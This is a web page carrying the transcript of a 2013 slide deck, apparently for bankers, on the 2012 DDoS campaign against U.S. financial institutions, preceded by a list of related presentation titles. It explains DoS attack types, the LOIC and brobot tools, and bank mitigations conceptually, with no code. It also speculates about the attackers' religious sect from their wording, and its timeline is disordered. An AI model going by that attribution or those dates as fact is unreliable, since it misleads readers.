Denial of Service Attacks Targeting U.S. Financial Institutions

Slides:

Advertisements

Similar presentations

(Distributed) Denial of Service Nick Feamster CS 4251 Spring 2008.

Advertisements

Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006.

Denial of Service & Session Hijacking.  Rendering a system unusable to those who deserve it  Consume bandwidth or disk space  Overwhelming amount of.

Attackers Vs. Defenders: Restoring the Equilibrium Ron Meyran Director of Security Marketing January 2013.

DDoS Attacks: The Latest Threat to Availability. © Sombers Associates, Inc The Anatomy of a DDoS Attack.

Intrusion Detection and Hackers Exploits IP Spoofing Attack Yousef Yahya & Ahmed Alkhamaisa Prepared for Arab Academy for Banking and Financial Sciences.

Lecture slides prepared for “Computer Security: Principles and Practice”, 2/e, by William Stallings and Lawrie Brown, Chapter 7 “Denial-of-Service-Attacks”.

Computer Security Fundamentals by Chuck Easttom Chapter 4 Denial of Service Attacks.

Security Issues and Challenges in Cloud Computing

Simulation and Analysis of DDos Attacks Poongothai, M Department of Information Technology,Institute of Road and Transport Technology, Erode Tamilnadu,

Introduction to Security Computer Networks Computer Networks Term B10.

Computer Security and Penetration Testing

Distributed Denial of Service Attacks CMPT Distributed Denial of Service Attacks Darius Law.

Security Awareness: Applying Practical Security in Your World

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Beyond the perimeter: the need for early detection of Denial of Service Attacks John Haggerty,Qi Shi,Madjid Merabti Presented by Abhijit Pandey.

UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.

Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Fall 2006.

Web server security Dr Jim Briggs WEBP security1.

Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Spring 2006.

Attack Profiles CS-480b Dick Steflik Attack Categories Denial-of-Service Exploitation Attacks Information Gathering Attacks Disinformation Attacks.

Lecture 15 Denial of Service Attacks

DENIAL OF SERVICE ATTACK

Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Denial of Service Attacks: Methods, Tools, and Defenses Authors: Milutinovic, Veljko, Savic, Milan, Milic, Bratislav,

DDoS Attack and Its Defense1 CSE 5473: Network Security Prof. Dong Xuan.

Common forms and remedies Neeta Bhadane Raunaq Nilekani Sahasranshu.

BOTNETS & TARGETED MALWARE Fernando Uribe. INTRODUCTION  Fernando Uribe   IT trainer and Consultant for over 15 years specializing.

1Federal Network Systems, LLC CIS Network Security Instructor Professor Mort Anvair Notice: Use and Disclosure of Data. Limited Data Rights. This proposal.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.

B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel

Computer Security: Principles and Practice First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Chapter 8 – Denial of Service.

Being an Intermediary for Another Attack Prepared By : Muhammad Majali Supervised By : Dr. Lo’ai Tawalbeh New York Institute of Technology (winter 2007)

Denial of Service Bryan Oemler Web Enhanced Information Management March 22 nd, 2011.

Topics to be covered 1. What are bots,botnet ? 2.How does it work? 4.Prevention of botnet. 3.Types of botnets.

Forensic and Investigative Accounting Chapter 14 Internet Forensics Analysis: Profiling the Cybercriminal © 2005, CCH INCORPORATED 4025 W. Peterson Ave.

It’s Not Just You! Your Site Looks Down From Here Santo Hartono, ANZ Country Manager March 2014 Latest Trends in Cyber Security.

Denial-of-Service Attacks Justin Steele Definition “A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate.

--Harish Reddy Vemula Distributed Denial of Service.

EC-Council Copyright © by EC-Council All Rights reserved. Reproduction is strictly prohibited Security News Source Courtesy:

Attacks On systems And Networks To understand how we can protect our system and network we need to know about what kind of attacks a hacker/cracker would.

1 CHAPTER 3 CLASSES OF ATTACK. 2 Denial of Service (DoS) Takes place when availability to resource is intentionally blocked or degraded Takes place when.

Fundamentals of Proxying. Proxy Server Fundamentals  Proxy simply means acting on someone other’s behalf  A Proxy acts on behalf of the client or user.

Network Security. 2 SECURITY REQUIREMENTS Privacy (Confidentiality) Data only be accessible by authorized parties Authenticity A host or service be able.

CHAPTER 3 Classes of Attack. INTRODUCTION Network attacks come from both inside and outside firewall. Kinds of attacks: 1. Denial-of-service 2. Information.

Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.

Denial of Service Sharmistha Roy Adversarial challenges in Web Based Services.

Denial of Service Datakom Ht08 Jesper Christensen, Patrick Johansson, Robert Kajic A short introduction to DoS.

Denial of Service Attacks

Denial of Service Attack 발표자 : 전지훈. What is Denial of Service Attack?  Denial of Service Attack = DoS Attack  Service attacks on a Web server floods.

Chapter 7 Denial-of-Service Attacks Denial-of-Service (DoS) Attack The NIST Computer Security Incident Handling Guide defines a DoS attack as: “An action.

________________ CS3235, Nov 2002 (Distributed) Denial of Service Relatively new development. –Feb 2000 saw attacks on Yahoo, buy.com, ebay, Amazon, CNN.

Attacking on IPv6 W.lilakiatsakun Ref: ipv6-attack-defense-33904http://

DoS/DDoS attack and defense

SEMINAR ON IP SPOOFING. IP spoofing is the creation of IP packets using forged (spoofed) source IP address. In the April 1989, AT & T Bell a lab was among.

Network Security Threats KAMI VANIEA 18 JANUARY KAMI VANIEA 1.

Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.

By Steve Shenfield COSC 480.  Definition  Incidents  Damages  Defense Mechanisms Firewalls/Switches/Routers Routing Techniques (Blackholing/Sinkholing)

Denial of Service A comparison of DoS schemes Kevin LaMantia COSC 316.

IPv6 Security Issues Georgios Koutepas, NTUA IPv6 Technology and Advanced Services Oct.19, 2004.

Spike DDoS Toolkit A Multiplatform Botnet Threat.

AP Waseem Iqbal.  DoS is an attack on computer or network that reduces, restricts or prevents legitimate of its resources  In a DoS attack, attackers.

DIVYA K 1RN09IS016 RNSIT1. Cloud computing provides a framework for supporting end users easily through internet. One of the security issues is how to.

Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.

Comparison of Network Attacks COSC 356 Kyler Rhoades.

DDoS Attacks on Financial Institutions Presentation

Domain 4 – Communication and Network Security

Network Security: IP Spoofing and Firewall

Red Team Exercise Part 3 Week 4

Presentation transcript:

Denial of Service Attacks Targeting U.S. Financial Institutions January 2013

Agenda What is DDoS Who’s Behind the Attacks and Why Timeline of the Attacks What Do the Attacks Look Like How are the Attacks Changing What are Banks Doing About It

Types of DoS Attacks ICMP Flood (Ping) – AKA Smurf Relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. Teardrop Attacks Older attack that sends mangled IP fragments with overlapping, over-sized payloads to the target machine. This can crash various older operating systems due to a bug in their TCP/IP fragmentation re-assembly code. Peer-to-Peer Attacks No botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a 'puppet master,' instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim’s website instead. Permanent Denial of Service – AKA Phlashing Damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, usually messing with firmware to render it inoperable. Nuke Old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop. Distributed Multiple systems flood the bandwidth or resources of a targeted system. Reflective Sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. Degradation-of-Service Compromised computers are directed to launch intermittent and short-lived flooding's of victim websites to slow it down rather than crashing it. Unintentional Unforeseen outages due to unplanned events, such as power failure, hardware/software bugs, or a sites sudden enormous spike in popularity. Blind Attacker must be able to receive traffic from the victim, then the attacker must either subvert the routing fabric or use the attacker's own IP address. Attacker uses a forged IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood attack is an example of a blind attack. Level II Cause a launching of a defense mechanism which blocks the network segment from which the attack originated. For audience reference only. There are many types of DOS attacks. We will focus on the primary one used against U.S. Financial Institutions… DDoS

What is a DDoS? Distributed Denial of Service (DDoS) Attack DDoS has nothing to do with the Operating System Acronym made popular by Microsoft in the 80’s/90’s (Disk Operating System)

How DDoS Looks Through the Eyes of Your Technology

DDoS Threat is not Temporary… Thanks to the increasing availability of custom coded DDoS modules within popular malware and crimeware releases, opportunistic cybercriminals are easily developing managed DDoS for hire, also known as “rent a botnet” services, next to orchestrating largely under-reported DDoS extortion campaigns against financial institutions and online gambling web sites. DDoS is here to stay… Not just a threat for Financial Services. DDoS is the new high tech protest method, similar to the “Sit In” of the 60’s…

Mainstream: Rent a BotNet Anyone with a cause and a little money can rent a botnet.

The Attacks: The “Who” is Important The ancient Chinese warrior Sun Tzu taught his men to "know your enemy" before going into battle. If "you know your enemy and know yourself," he wrote, "you need not fear the result of a hundred battles." But, "If you know yourself but not the enemy, for every victory gained you will also suffer a defeat." Understand your opponent; Funding Techniques Capabilities Weapons Scale Focus/Drivers Why When have you “Won”?

Who and Why? Izz ad-Din al-Qassam Cyber Fighters Pastebin Post - protest against the “Innocence of Muslims” trailer that ridiculed the Prophet Mohammad. (Available on MetaTube) “Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad” http://pastebin.com/yftgau9w * DO NOT GO TO THIS SITE WITHOUT ANONOMYZING *

Attackers Country Affiliation NOT Proven to be State sponsored at this time. Interesting statement in a recent post says “..continue to insult Muslim saints” may provide a better understanding of the source. Likely indicates Shia Muslim origin. Research indicates that the vast majority of Muslims are Sunni (85%), who vehemently reject the concept of sainthood, while the Shia accept this term. Previous posts implied all Muslims are offended and participating in these attacks. This new term indicates only a small geographic region, centered on Iran, may be offended. Previous guesses at attribution have indicated Iran with no evidence to support those claims. One could presume that the pastebin posts and the translation are under the control of the originator (as they use it as an official channel), so this is not a mistake. Shia Muslims believe that an Imam (Islamic leadership position) is sinless by nature, and that his authority is infallible as it comes directly from God. Therefore, Shia Muslims often honor the Imams as saints and perform pilgrimages to their tombs and shrines in the hopes of divine intercession. Sunni Muslims counter that there is no basis in Islam for a hereditary privileged class of spiritual leaders, and certainly no basis for the veneration or intercession of saints. Sunni Muslims contend that leadership of the community is not a birthright, but a trust that is earned and which may be given or taken away by the people themselves.

Public Reaction OMG… What are we going to do? ….Where’d they go? OMG… There Back… Who’s on first… They are very disorganized… There is no real “Leader” of this group… primarily only contributors communicating over chat.

Who Has Been Targeted? May not be a comprehensive list… The news reports on the impact identified by large numbers of consumers. Financial Institutions are generally not reporting these outages. Only a few larger institutions have proactively communicated to their customers (web pages, email or social media venues).

Timeline of Attacks Targeting US Financial Institutions (Americans) January 3-6, 2012 Muslim Cyber Fighters Announce attacks against JPMorgan Chase, Bank of America, Citibank, Wells Fargo, US Banc, PNC Financial Services Group, BB&T, SunTrust and Regions September 18, 2012 Muslim Cyber Fighters claim responsibility for BoA, CITI, and NYSE Hack in retaliation for the Innocence of Muslim Movie September 19, 2012 Muslim Cyber Fighters Attack Chase Bank December 19-20, 2012 Muslim Cyber Fighters target BB&T, US Bank, and PNC September 27, 2012 Muslim Cyber Fighters Attack Wells Fargo and US Bank September 28, 2012 Muslim Cyber Fighters Attack PNC December 11-14, 2012 Muslim Cyber Fighters Announce PHASE 2 targeting U.S. Bancorp, JP Morgan Chase, Bank of America, PNC, and SunTrust Banks Targeting Banks to Hurt Americans, not the Banks… Americans are seen as being highly driven by money, so they see this as the best target. They believe that by doing this, Americans will demand their leaders to remove the content from the Internet. October 9 -11, 2012 Muslim Cyber Fighters Attack CapitalOne, SunTrust and Regions November, 2012 Muslim Cyber Fighters acquire different infrastructure and enhances tools used Late October, 2012 Muslim Cyber Fighters infrastructure taken down by US Law Enforcement, Carriers, and Private Sector

What do the Attacks Look Like? Up to 80GBps The attacks started with HTTP and HTTPS traffic targeting the institutions public websites Followed by attacks against the customer login site which caused a significant spike in the firewall state tables. Next wave of attacks changed over to DNS server over loading. Next the logic and database layers are attacked by performing many large full site searches. If more is needed, targeting of the download of large files is used.

Impact from the Attacks Local Internet Services around FI Datacenters Customer Impacts Nothing/Slow/Down Retail Online Banking WWW Site (Login Page?) Reduced Website Functionality Mobile Not Targeted (Yet) Call Center DDoS Alternate Communication Channels Social Media

Wave One Attack GEO Sources

Tools are They Using LOIC (Low Orbit Ion Cannon) Open source network stress testing and denial-of-service attack application. LOIC was initially developed by Praetox Technologies for the purposes of network load testing, but was later released into the public domain. itsoknoproblembro – AKA brobot Designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine. It injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time. Initial server infection is usually done by using the well known Remote File Inclusion (RFI) technique.

Sophistication is Changing Initially Targets Announced Scheduled and Automated Same Attack for all FI’s Finger Printed User Agent String Invalid Keep Alive (= 0) Recent Attacks target specific likely site weaknesses Unannounced Long Lasting / No Schedule Hashing (masking) Uniquely Identifiable Information EST - 9 / 12 / 3 / 5

What are Banks Doing About It? Acquire / Refine Current Mitigation Cloud Service Providers DDoS Mitigation (BlackHole) DNS Outsourcing Content Delivery Networks (CDN’s) Premise Technology Firewalls and Intrusion Prevention Systems to Block bad Traffic Turn off/down non mission critical services (Search, File Downloading, etc…) Add more capacity (Internet, Servers, Network) Mitigation Testing Incident Management Exercising Communication Plans

Final Thought: Remember it’s Mitigation NOT Elimination The goal is to stay afloat while under attack. Current US Law prohibits using offensive forces while being attacked via a cyber channel.